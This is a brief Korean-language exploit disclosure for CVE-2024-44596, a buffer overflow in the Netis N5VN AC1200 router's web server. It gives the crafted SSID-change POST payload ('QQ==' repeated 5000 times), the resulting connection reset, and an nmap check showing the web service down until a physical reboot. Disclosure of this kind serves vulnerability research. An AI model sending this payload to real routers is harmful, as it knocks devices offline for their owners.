
날짜: 05/03/2024
Exploit 작성자: Van Lam Nguyen
Facebook: fb.com/vanlam1412
공급업체 홈페이지: Netis Systems
버전: Netis N5VN AC1200 V1.0.1.1742
테스트 환경: Windows
CVE : CVE-2024-44596
Netis N5VN AC1200 라우터에는 버퍼 오버플로우 취약점이 존재하며, 이를 통해 공격자는 조작된 요청을 보내 라우터에서 실행 중인 웹 서버를 충돌시킬 수 있습니다.
http(웹 서버)를 복구하려면 사용자가 라우터를 물리적으로 재부팅해야 합니다.
Wireless 2.4G의 ssid를 변경하는 POST 요청 ('ssid': 'QQ==' * 5000)
성공적으로: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
nmap 192.168.1.254 -p 80 80/tcp closed http

